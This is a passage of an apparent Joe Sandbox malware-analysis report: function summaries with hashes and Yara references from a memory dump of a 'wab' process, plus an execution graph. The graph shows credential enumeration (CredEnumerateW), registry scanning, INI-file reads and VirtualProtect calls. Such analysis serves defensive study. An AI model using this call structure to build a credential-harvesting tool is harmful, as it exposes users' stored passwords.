                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                    • API String ID: 2773794195-880857682
                                                                                                                                                                                                                    • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                    • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 231171946-0
                                                                                                                                                                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1961120804-0
                                                                                                                                                                                                                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:2.6%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:20.4%
                                                                                                                                                                                                                    Signature Coverage:0.5%
                                                                                                                                                                                                                    Total number of Nodes:845
                                                                                                                                                                                                                    Total number of Limit Nodes:17
                                                                                                                                                                                                                    execution_graph 34077 43ee43 59 API calls 34079 405e41 14 API calls 33890 429046 memset memset memcpy memset memset 33891 432447 17 API calls 33892 401445 memcpy memcpy DialogBoxParamA 33893 413848 strcmp 33894 41104f 16 API calls 33896 411a2d 14 API calls 34084 424852 76 API calls 33898 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34085 432654 15 API calls 33903 40b05a LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 33906 401060 41 API calls 32985 410663 EnumResourceNamesA 33908 40b865 8 API calls 33909 427867 15 API calls 34088 425e13 87 API calls 33910 404469 22 API calls 34090 41466f 16 API calls 33913 425474 16 API calls 33914 426474 memcpy memset memset memcpy 34092 42e27a 61 API calls 34095 411201 RtlDeleteCriticalSection 33917 444003 __dllonexit 34099 404207 modf 33919 410808 memset SHGetPathFromIDList SendMessageA 33920 42a80b 27 API calls 33864 444a0f 33865 444a26 33864->33865 33868 444a94 33864->33868 33865->33868 33871 444a4e 33865->33871 33867 444a45 33867->33868 33869 444a75 VirtualProtect 33867->33869 33869->33868 33870 444a84 VirtualProtect 33869->33870 33870->33868 33872 444a53 33871->33872 33876 444a94 33872->33876 33878 444a6b 33872->33878 33874 444a5c 33875 444a75 VirtualProtect 33874->33875 33874->33876 33875->33876 33877 444a84 VirtualProtect 33875->33877 33877->33876 33879 444a71 33878->33879 33880 444a75 VirtualProtect 33879->33880 33882 444a94 33879->33882 33881 444a84 VirtualProtect 33880->33881 33880->33882 33881->33882 34101 40420c 12 API calls 34105 409213 10 API calls 33923 411014 15 API calls 34106 404217 26 API calls 34107 403a18 strlen WriteFile 33924 43f41d 17 API calls 33925 43f022 19 API calls 34110 408e21 7 API calls 34111 411222 RtlEnterCriticalSection 34114 43ee2d 112 API calls 34115 411231 RtlLeaveCriticalSection 34116 403632 21 API calls 34119 413e34 19 API calls 33934 427434 76 API calls 33935 423c3b 19 API calls 33939 405cc1 65 API calls 33941 424852 75 API calls 34121 4092cb 17 API calls 34122 4442cf _exit _c_exit 33945 43ecc8 18 API calls 34123 408ed5 7 API calls 34125 405edc SetDlgItemTextA GetDlgItemTextA 33950 424852 79 API calls 33951 424852 76 API calls 34126 427645 42 API calls 33954 4338e6 15 API calls 34128 43eae9 149 API calls 33956 4100ec 42 API calls 33958 426ced memset memset memcpy 34129 40c2ef 43 API calls 34130 40def0 9 API calls 34131 403af4 54 API calls 33963 43e8f9 122 API calls 34132 4016fc NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34133 4336fd 17 API calls 34134 403e83 34 API calls 34135 42968a 11 API calls 34136 40da89 42 API calls 33965 425e13 21 API calls 33967 43ec88 119 API calls 33968 426c8e 41 API calls 34137 433a8f 18 API calls 33970 409c8d _strcmpi 34139 44128b memcmp 34144 40aa94 7 API calls 34146 424852 111 API calls 34147 43f698 21 API calls 34152 4276ad 47 API calls 34153 423ab3 18 API calls 34155 43f2b7 17 API calls 33983 43f4ba 18 API calls 34156 424852 85 API calls 34157 4442bb _XcptFilter 33988 444941 ??3@YAXPAX 33990 424852 77 API calls 34158 43ef44 20 API calls 33991 42d14a 22 API calls 34159 404348 19 API calls 33992 40b94b 138 API calls 34161 424852 76 API calls 34162 40c750 59 API calls 33995 414557 memset memset 33996 42523b 79 API calls 33998 40ad58 30 API calls 34000 44315e 44 API calls 34001 41055b WritePrivateProfileStringA GetPrivateProfileStringA 34166 413f5c 18 API calls 34168 43f361 134 API calls 34005 440162 17 API calls 34006 444963 FreeLibrary 34007 429d69 memcpy 34169 40176b ExitProcess 34171 43eb6e 17 API calls 34009 437972 110 API calls 34010 405972 40 API calls 34173 442f71 _mbscpy 34012 403577 20 API calls 34015 44497b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34018 444905 _onexit __dllonexit 34019 43ed07 20 API calls 32986 410507 32989 4103e0 32986->32989 32988 410527 32990 4103ec 32989->32990 32991 4103fe GetPrivateProfileIntA 32989->32991 32994 4102f8 memset _itoa WritePrivateProfileStringA 32990->32994 32991->32988 32993 4103f9 32993->32988 32994->32993 34175 415b07 memcpy memcpy memcpy memcpy 34176 40af07 8 API calls 34022 414d0c 22 API calls 34023 433513 19 API calls 34180 424852 83 API calls 34027 40a117 memset sprintf SendMessageA 34181 40c319 125 API calls 34182 40b31a memset memset _mbsicmp 34029 410d1d 18 API calls 34186 441727 38 API calls 34031 433126 16 API calls 34188 42732a 24 API calls 32995 44412e 33014 44431c 32995->33014 32997 44413a GetModuleHandleA 32998 44414c __set_app_type __p__fmode __p__commode 32997->32998 33000 4441de 32998->33000 33001 4441e6 __setusermatherr 33000->33001 33002 4441f2 33000->33002 33001->33002 33015 444306 _controlfp 33002->33015 33004 4441f7 _initterm __getmainargs _initterm 33005 44424e GetStartupInfoA 33004->33005 33007 444282 GetModuleHandleA 33005->33007 33016 40cc66 33007->33016 33011 4442b3 _cexit 33013 4442e8 33011->33013 33012 4442ac exit 33012->33011 33014->32997 33015->33004 33067 404a94 LoadLibraryA 33016->33067 33018 40cc82 33019 40cc86 33018->33019 33075 41067e 33018->33075 33019->33011 33019->33012 33021 40cc91 33079 40c9f7 ??2@YAPAXI 33021->33079 33023 40ccbd 33093 407a4b 33023->33093 33028 40cce6 33111 409596 memset 33028->33111 33029 40ccfa 33116 409465 memset 33029->33116 33034 40cea3 ??3@YAXPAX 33036 40cec1 DeleteObject 33034->33036 33037 40ced5 33034->33037 33035 407bbf _strcmpi 33038 40cd10 33035->33038 33036->33037 33140 4076d7 ??3@YAXPAX ??3@YAXPAX 33037->33140 33040 40cd14 RegDeleteKeyA 33038->33040 33041 40cd29 EnumResourceTypesA 33038->33041 33040->33034 33043 40cd51 MessageBoxA 33041->33043 33044 40cd69 33041->33044 33042 40cee6 33141 4045bd ??3@YAXPAX 33042->33141 33043->33034 33046 40cdc2 CoInitialize 33044->33046 33121 40cb90 33044->33121 33138 40c946 strncat memset RegisterClassA CreateWindowExA 33046->33138 33048 40ceef 33142 4076d7 ??3@YAXPAX ??3@YAXPAX 33048->33142 33050 40cdd3 ShowWindow UpdateWindow LoadAcceleratorsA 33139 40bfb1 PostMessageA 33050->33139 33054 40cdc0 33054->33046 33055 40cd83 ??3@YAXPAX 33055->33037 33057 40cda6 DeleteObject 33055->33057 33057->33037 33059 40ce1b GetMessageA 33060 40ce9d 33059->33060 33061 40ce2f 33059->33061 33060->33034 33062 40ce35 TranslateAccelerator 33061->33062 33064 40ce67 IsDialogMessage 33061->33064 33065 40ce5b IsDialogMessage 33061->33065 33062->33061 33063 40ce8f GetMessageA 33062->33063 33063->33060 33063->33062 33064->33063 33066 40ce79 TranslateMessage DispatchMessageA 33064->33066 33065->33063 33065->33064 33066->33063 33068 404abf GetProcAddress 33067->33068 33071 404ae7 33067->33071 33069 404ad8 FreeLibrary 33068->33069 33072 404acf 33068->33072 33070 404ae3 33069->33070 33069->33071 33070->33071 33073 404af7 MessageBoxA 33071->33073 33074 404b0e 33071->33074 33072->33069 33073->33018 33074->33018 33076 410687 LoadLibraryA 33075->33076 33077 4106ac 33075->33077 33076->33077 33078 41069b GetProcAddress 33076->33078 33077->33021 33078->33077 33080 40ca28 ??2@YAPAXI 33079->33080 33082 40ca46 33080->33082 33083 40ca4d 33080->33083 33150 40400d 6 API calls 33082->33150 33085 40ca86 33083->33085 33086 40ca79 DeleteObject 33083->33086 33143 406e26 33085->33143 33086->33085 33088 40ca8b 33146 4019b4 33088->33146 33091 4019b4 strncat 33092 40cadf _mbscpy 33091->33092 33092->33023 33152 4076d7 ??3@YAXPAX ??3@YAXPAX 33093->33152 33095 407a86 33098 4077ae malloc memcpy ??3@YAXPAX ??3@YAXPAX 33095->33098 33099 407b6b 33095->33099 33101 407b09 ??3@YAXPAX 33095->33101 33106 407b93 33095->33106 33156 4076fd 7 API calls 33095->33156 33157 406cce 33095->33157 33098->33095 33099->33106 33165 4077ae 33099->33165 33101->33095 33153 4077e4 33106->33153 33107 407bbf 33108 407be6 33107->33108 33109 407bc7 33107->33109 33108->33028 33108->33029 33109->33108 33110 407bd0 _strcmpi 33109->33110 33110->33108 33110->33109 33171 409570 33111->33171 33113 4095c5 33176 4094a2 33113->33176 33117 409570 3 API calls 33116->33117 33118 409494 33117->33118 33196 4093dd 33118->33196 33210 4023a9 33121->33210 33127 40cbf4 33299 40cafa 7 API calls 33127->33299 33128 40cbef 33132 40cc60 33128->33132 33251 40c12b memset GetModuleFileNameA strrchr 33128->33251 33132->33054 33132->33055 33134 40cc0e 33278 40ad59 33134->33278 33138->33050 33139->33059 33140->33042 33141->33048 33142->33019 33151 406d65 memset _mbscpy 33143->33151 33145 406e3d CreateFontIndirectA 33145->33088 33147 4019e0 33146->33147 33148 4019c1 strncat 33147->33148 33149 4019e4 memset LoadIconA 33147->33149 33148->33147 33149->33091 33150->33083 33151->33145 33152->33095 33154 4077f4 33153->33154 33155 4077ea ??3@YAXPAX 33153->33155 33154->33107 33155->33154 33156->33095 33158 406cd5 malloc 33157->33158 33159 406d1b 33157->33159 33161 406d11 33158->33161 33162 406cf6 33158->33162 33159->33095 33161->33095 33163 406d0a ??3@YAXPAX 33162->33163 33164 406cfa memcpy 33162->33164 33163->33161 33164->33163 33166 4077c7 33165->33166 33167 4077bc ??3@YAXPAX 33165->33167 33168 406cce 3 API calls 33166->33168 33169 4077d2 33167->33169 33168->33169 33170 4076fd 7 API calls 33169->33170 33170->33106 33187 406d34 GetModuleFileNameA 33171->33187 33173 409576 strrchr 33174 409585 33173->33174 33175 409588 _mbscat 33173->33175 33174->33175 33175->33113 33188 4446d0 33176->33188 33178 4094af _mbscpy _mbscpy 33190 40907d 33178->33190 33181 40907d 3 API calls 33182 4094ea EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33181->33182 33183 409536 LoadStringA 33182->33183 33184 40954c 33183->33184 33184->33183 33186 409564 33184->33186 33195 4090eb memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33184->33195 33186->33034 33187->33173 33189 4446d7 33188->33189 33189->33178 33189->33189 33191 4446d0 33190->33191 33192 40908a memset GetPrivateProfileStringA 33191->33192 33193 4090e5 33192->33193 33194 4090d5 WritePrivateProfileStringA 33192->33194 33193->33181 33194->33193 33195->33184 33206 406d1f GetFileAttributesA 33196->33206 33198 4093e6 33199 40945f 33198->33199 33200 4093eb _mbscpy _mbscpy GetPrivateProfileIntA 33198->33200 33199->33035 33207 408fe9 GetPrivateProfileStringA 33200->33207 33202 40943a 33208 408fe9 GetPrivateProfileStringA 33202->33208 33204 40944b 33209 408fe9 GetPrivateProfileStringA 33204->33209 33206->33198 33207->33202 33208->33204 33209->33199 33301 409989 33210->33301 33213 401e60 memset 33340 41072b 33213->33340 33216 401eb9 33370 406e81 strlen _mbscat _mbscpy _mbscat 33216->33370 33217 401ecb 33355 406d1f GetFileAttributesA 33217->33355 33220 401edd strlen strlen 33222 401f1f 33220->33222 33223 401f0c 33220->33223 33356 406d1f GetFileAttributesA 33222->33356 33371 406e81 strlen _mbscat _mbscpy _mbscat 33223->33371 33226 401f2c 33357 401c30 33226->33357 33230 401c30 7 API calls 33232 401f6c 33230->33232 33231 401f88 33233 401f93 memset 33231->33233 33234 40217e 33231->33234 33369 410411 RegOpenKeyExA 33232->33369 33372 4104d7 RegEnumKeyExA 33233->33372 33236 40219f _strcmpi 33234->33236 33237 40218c ExpandEnvironmentStringsA 33234->33237 33236->33127 33236->33128 33381 406d1f GetFileAttributesA 33237->33381 33239 402175 RegCloseKey 33239->33234 33240 401fd0 atoi 33241 401fe6 memset memset sprintf 33240->33241 33249 401fc0 33240->33249 33373 410493 33241->33373 33244 40215c 33244->33239 33245 40206d memset memset strlen strlen 33245->33249 33246 4020d4 strlen strlen 33246->33249 33247 406e81 strlen _mbscat _mbscpy _mbscat 33247->33249 33248 406d1f GetFileAttributesA 33248->33249 33249->33239 33249->33240 33249->33244 33249->33245 33249->33246 33249->33247 33249->33248 33250 40215e _mbscpy 33249->33250 33380 4104d7 RegEnumKeyExA 33249->33380 33250->33239 33252 40c17b 33251->33252 33253 40c17e _mbscat _mbscpy _mbscpy 33251->33253 33252->33253 33254 40c1f6 33253->33254 33255 40c26b 33254->33255 33256 40c25b GetWindowPlacement 33254->33256 33257 40c291 33255->33257 33402 4017d1 GetSystemMetrics GetSystemMetrics SetWindowPos 33255->33402 33256->33255 33395 40989e 33257->33395 33261 40b783 33262 40b7e2 33261->33262 33267 40b797 33261->33267 33405 406a00 LoadCursorA SetCursor 33262->33405 33264 40b7e7 33406 410411 RegOpenKeyExA 33264->33406 33407 40472f 33264->33407 33415 404780 33264->33415 33418 403c03 33264->33418 33494 410166 33264->33494 33265 40b79e _mbsicmp 33265->33267 33266 40b7fb 33268 407bbf _strcmpi 33266->33268 33267->33262 33267->33265 33497 40b340 10 API calls 33267->33497 33271 40b80b 33268->33271 33269 40b855 SetCursor 33269->33134 33271->33269 33272 40b84c qsort 33271->33272 33272->33269 33279 40ad6d 33278->33279 33858 409b5a SendMessageA ??2@YAPAXI ??3@YAXPAX 33278->33858 33281 40ad75 33279->33281 33282 40ad7e GetStdHandle 33279->33282 33857 406ab8 CreateFileA 33281->33857 33284 40ad7b 33282->33284 33285 40ad94 33284->33285 33286 40ae8c 33284->33286 33859 406a00 LoadCursorA SetCursor 33285->33859 33863 406b15 9 API calls 33286->33863 33289 40ae95 33300 40c2d6 28 API calls 33289->33300 33290 40ada1 33291 40ade6 33290->33291 33297 40ae00 33290->33297 33860 40a2db strlen WriteFile 33290->33860 33291->33297 33861 40a3f8 12 API calls 33291->33861 33294 40ae35 33295 40ae75 CloseHandle 33294->33295 33296 40ae7e SetCursor 33294->33296 33295->33296 33296->33289 33297->33294 33862 406b15 9 API calls 33297->33862 33299->33128 33300->33132 33313 40979f 33301->33313 33304 4099ed memcpy memcpy 33305 409a47 33304->33305 33305->33304 33306 409a85 ??2@YAPAXI ??2@YAPAXI 33305->33306 33310 408b27 12 API calls 33305->33310 33308 409ac1 ??2@YAPAXI 33306->33308 33309 409af8 33306->33309 33308->33309 33323 409909 33309->33323 33310->33305 33312 4023b8 33312->33213 33314 4097b1 33313->33314 33315 4097aa ??3@YAXPAX 33313->33315 33316 4097b8 ??3@YAXPAX 33314->33316 33317 4097bf 33314->33317 33315->33314 33316->33317 33318 4097c9 ??3@YAXPAX 33317->33318 33320 4097d0 33317->33320 33318->33320 33319 4097f0 ??2@YAPAXI ??2@YAPAXI 33319->33304 33320->33319 33321 4097e0 ??3@YAXPAX 33320->33321 33322 4097e9 ??3@YAXPAX 33320->33322 33321->33322 33322->33319 33324 4077e4 ??3@YAXPAX 33323->33324 33325 409912 33324->33325 33326 4077e4 ??3@YAXPAX 33325->33326 33327 40991a 33326->33327 33328 4077e4 ??3@YAXPAX 33327->33328 33329 409922 33328->33329 33330 4077e4 ??3@YAXPAX 33329->33330 33331 40992a 33330->33331 33332 4077ae 4 API calls 33331->33332 33333 40993d 33332->33333 33334 4077ae 4 API calls 33333->33334 33335 409947 33334->33335 33336 4077ae 4 API calls 33335->33336 33337 409951 33336->33337 33338 4077ae 4 API calls 33337->33338 33339 40995b 33338->33339 33339->33312 33341 41067e 2 API calls 33340->33341 33342 41073a 33341->33342 33343 41076d memset 33342->33343 33382 406e4c 33342->33382 33348 41078d 33343->33348 33347 401e95 strlen strlen 33347->33216 33347->33217 33385 410411 RegOpenKeyExA 33348->33385 33349 4107ba 33350 4107ef _mbscpy 33349->33350 33386 4106ad _mbscpy 33349->33386 33350->33347 33352 4107cb 33387 410452 RegQueryValueExA 33352->33387 33354 4107e3 RegCloseKey 33354->33350 33355->33220 33356->33226 33388 410411 RegOpenKeyExA 33357->33388 33359 401c4b 33360 401cac 33359->33360 33389 410452 RegQueryValueExA 33359->33389 33360->33230 33360->33232 33362 401c69 33363 401c70 strchr 33362->33363 33364 401ca3 RegCloseKey 33362->33364 33363->33364 33365 401c84 strchr 33363->33365 33364->33360 33365->33364 33366 401c93 33365->33366 33390 406ca4 strlen 33366->33390 33368 401ca0 33368->33364 33369->33231 33370->33217 33371->33222 33372->33249 33393 410411 RegOpenKeyExA 33373->33393 33375 4104a9 33376 4104d2 33375->33376 33394 410452 RegQueryValueExA 33375->33394 33376->33249 33378 4104c1 RegCloseKey 33378->33376 33380->33249 33381->33236 33383 406e5b GetVersionExA 33382->33383 33384 406e6c 33382->33384 33383->33384 33384->33343 33384->33347 33385->33349 33386->33352 33387->33354 33388->33359 33389->33362 33391 406cb5 33390->33391 33392 406cb8 memcpy 33390->33392 33391->33392 33392->33368 33393->33375 33394->33378 33396 4098ad 33395->33396 33398 4098bb 33395->33398 33403 409669 memset SendMessageA 33396->33403 33399 409906 33398->33399 33400 4098f8 33398->33400 33399->33261 33404 4095d9 SendMessageA 33400->33404 33402->33257 33403->33398 33404->33399 33405->33264 33406->33266 33408 404780 FreeLibrary 33407->33408 33409 404736 LoadLibraryA 33408->33409 33410 404747 GetProcAddress 33409->33410 33411 404769 33409->33411 33410->33411 33412 40475f 33410->33412 33413 40477c 33411->33413 33414 404780 FreeLibrary 33411->33414 33412->33411 33413->33266 33414->33413 33416 404794 FreeLibrary 33415->33416 33417 40479e 33415->33417 33416->33417 33417->33266 33419 410166 FreeLibrary 33418->33419 33420 403c1d LoadLibraryA 33419->33420 33421 403c61 33420->33421 33422 403c31 GetProcAddress 33420->33422 33424 410166 FreeLibrary 33421->33424 33422->33421 33423 403c4b 33422->33423 33423->33421 33427 403c58 33423->33427 33425 403c68 33424->33425 33426 40472f 3 API calls 33425->33426 33428 403c73 33426->33428 33427->33425 33498 4036d7 33428->33498 33431 4036d7 26 API calls 33432 403c87 33431->33432 33433 4036d7 26 API calls 33432->33433 33434 403c91 33433->33434 33435 4036d7 26 API calls 33434->33435 33436 403c9b 33435->33436 33510 408344 33436->33510 33444 403cd2 33445 403ce4 33444->33445 33693 402bc3 39 API calls 33444->33693 33558 410411 RegOpenKeyExA 33445->33558 33448 403cf7 33449 403d09 33448->33449 33694 402bc3 39 API calls 33448->33694 33559 402c4f 33449->33559 33453 406e4c GetVersionExA 33454 403d1e 33453->33454 33577 410411 RegOpenKeyExA 33454->33577 33456 403d3e 33457 403d4e 33456->33457 33695 402b14 46 API calls 33456->33695 33578 410411 RegOpenKeyExA 33457->33578 33460 403d74 33461 403d84 33460->33461 33696 402b14 46 API calls 33460->33696 33579 410411 RegOpenKeyExA 33461->33579 33464 403daa 33465 403dba 33464->33465 33697 402b14 46 API calls 33464->33697 33580 41017d 33465->33580 33469 404780 FreeLibrary 33470 403dd5 33469->33470 33584 402fcd 33470->33584 33473 402fcd 34 API calls 33474 403ded 33473->33474 33600 4032a9 33474->33600 33483 403e28 33485 403e60 33483->33485 33486 403e33 _mbscpy 33483->33486 33647 40f478 33485->33647 33699 40eca9 303 API calls 33486->33699 33495 410171 FreeLibrary 33494->33495 33496 41017c 33494->33496 33495->33496 33496->33266 33497->33267 33499 4037b7 33498->33499 33500 4036ed 33498->33500 33499->33431 33700 4101d8 UuidFromStringA UuidFromStringA memcpy 33500->33700 33502 403700 33502->33499 33503 403708 strchr 33502->33503 33503->33499 33504 403722 33503->33504 33701 4021ad memset 33504->33701 33506 403731 _mbscpy _mbscpy strlen 33507 403796 _mbscpy 33506->33507 33508 40377b sprintf 33506->33508 33702 4023d7 16 API calls 33507->33702 33508->33507 33511 408354 33510->33511 33703 408043 11 API calls 33511->33703 33515 408372 33516 403ca7 33515->33516 33517 40837d memset 33515->33517 33528 407f93 33516->33528 33706 4104d7 RegEnumKeyExA 33517->33706 33519 408444 RegCloseKey 33519->33516 33521 4083a9 33521->33519 33522 4083ce memset 33521->33522 33707 410411 RegOpenKeyExA 33521->33707 33710 4104d7 RegEnumKeyExA 33521->33710 33708 410452 RegQueryValueExA 33522->33708 33525 408406 33709 4081fd 10 API calls 33525->33709 33527 40841d RegCloseKey 33527->33521 33711 410411 RegOpenKeyExA 33528->33711 33530 407fb5 33531 403cb3 33530->33531 33532 407fbc memset 33530->33532 33540 408458 33531->33540 33712 4104d7 RegEnumKeyExA 33532->33712 33534 408035 RegCloseKey 33534->33531 33536 407fe5 33536->33534 33713 410411 RegOpenKeyExA 33536->33713 33714 407e63 11 API calls 33536->33714 33715 4104d7 RegEnumKeyExA 33536->33715 33539 408018 RegCloseKey 33539->33536 33716 4045d6 33540->33716 33543 408660 33724 404651 33543->33724 33545 4084a5 33545->33543 33548 4084af wcslen 33545->33548 33547 4084a3 CredEnumerateW 33547->33545 33548->33543 33555 4084e2 33548->33555 33549 4084ec _wcsncoll 33549->33555 33551 40472f 3 API calls 33551->33555 33552 404780 FreeLibrary 33552->33555 33553 408584 memset 33554 4085b1 memcpy wcschr 33553->33554 33553->33555 33554->33555 33555->33543 33555->33549 33555->33551 33555->33552 33555->33553 33555->33554 33556 408634 LocalFree 33555->33556 33727 404666 _mbscpy 33555->33727 33556->33555 33557 410411 RegOpenKeyExA 33557->33444 33558->33448 33728 410411 RegOpenKeyExA 33559->33728 33561 402c6c 33562 402d97 33561->33562 33563 402c79 memset 33561->33563 33562->33453 33729 4104d7 RegEnumKeyExA 33563->33729 33565 402d8e RegCloseKey 33565->33562 33566 410493 3 API calls 33567 402cd6 memset sprintf 33566->33567 33730 410411 RegOpenKeyExA 33567->33730 33569 402d1a 33570 402d2c sprintf 33569->33570 33731 402bc3 39 API calls 33569->33731 33732 410411 RegOpenKeyExA 